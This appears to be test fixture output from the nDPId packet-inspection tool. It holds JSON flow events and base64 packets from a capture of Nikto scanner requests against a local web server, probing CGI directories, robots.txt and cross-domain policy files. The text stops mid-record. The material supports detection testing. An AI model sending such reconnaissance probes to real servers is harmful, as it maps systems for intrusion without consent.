-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276722,"pkt":"AAAAAAAAAAAAAAAACABFAADF6C5AAEAGVAJ\/AAABfwAAAcHcH5DviNAxcnIUCYAYAED+uQAAAQEICp1m+xqdZvsaR0VUIC9mY2dpLWJpbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276724,"pkt":"AAAAAAAAAAAAAAAACABFAADEjEdAAEAGr+p\/AAABfwAAAcHeH5D1xLRZpE\/AW4AYAED+uAAAAQEICp1m+xydZvscR0VUIC9jZ2ktZXhlLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276725,"pkt":"AAAAAAAAAAAAAAAACABFAADFFmlAAEAGJch\/AAABfwAAAcHgH5D+Si57PKwG0oAYAED+uQAAAQEICp1m+x2dZvsdR0VUIC9jZ2ktaG9tZS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276727,"pkt":"AAAAAAAAAAAAAAAACABFAADFtaJAAEAGho5\/AAABfwAAAcHiH5DFGI2++SyH14AYAED+uQAAAQEICp1m+x+dZvsfR0VUIC9jZ2ktcGVybC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276728,"pkt":"AAAAAAAAAAAAAAAACABFAADFuPZAAEAGgzp\/AAABfwAAAcHkH5CSdoDrZ1cRi4AYAED+uQAAAQEICp1m+yCdZvsgR0VUIC9zY2dpLWJpbi8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276730,"pkt":"AAAAAAAAAAAAAAAACABFAADIS5pAAEAG8JN\/AAABfwAAAcHmH5DcbnOH9ynG7oAYAED+vAAAAQEICp1m+yKdZvsiR0VUIC9jZ2ktYmluLXNkYi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276733,"pkt":"AAAAAAAAAAAAAAAACABFAADE3RFAAEAGXyB\/AAABfwAAAcHoH5BtNeURIEAjc4AYAED+uAAAAQEICp1m+ySdZvskR0VUIC9jZ2ktbW9kLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1576420276734,"pkt":"AAAAAAAAAAAAAAAACABFAAC0+gVAAEAGQjx\/AAABfwAAAcHqH5Dwf8IdIiKU7IAYAED+qAAAAQEICp1m+yadZvsmR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnBhdGhzKQ0KDQo="} -01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1576420276738,"pkt":"AAAAAAAAAAAAAAAACABFAADXryVAAEAGjPl\/AAABfwAAAcHsH5B635cEZT8z4YAYAED+ywAAAQEICp1m+yqdZvsqR0VUIC9jbGllbnRhY2Nlc3Nwb2xpY3kueG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjbGllbnRhY2Nlc3Nwb2xpY3kpDQoNCg=="} -01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276739,"pkt":"AAAAAAAAAAAAAAAACABFAADJlTdAAEAGpvV\/AAABfwAAAcHuH5Dvz60WkSjxAoAYAED+vQAAAQEICp1m+yudZvsrR0VUIC9jcm9zc2RvbWFpbi54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNyb3NzZG9tYWluKQ0KDQo="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276741,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/JMVAAEAGF3J\/AAABfwAAAcHwH5DeWhzjQtAeBoAYAED+swAAAQEICp1m+yydZvssR0VUIC9yb2JvdHMudHh0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpyb2JvdHMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 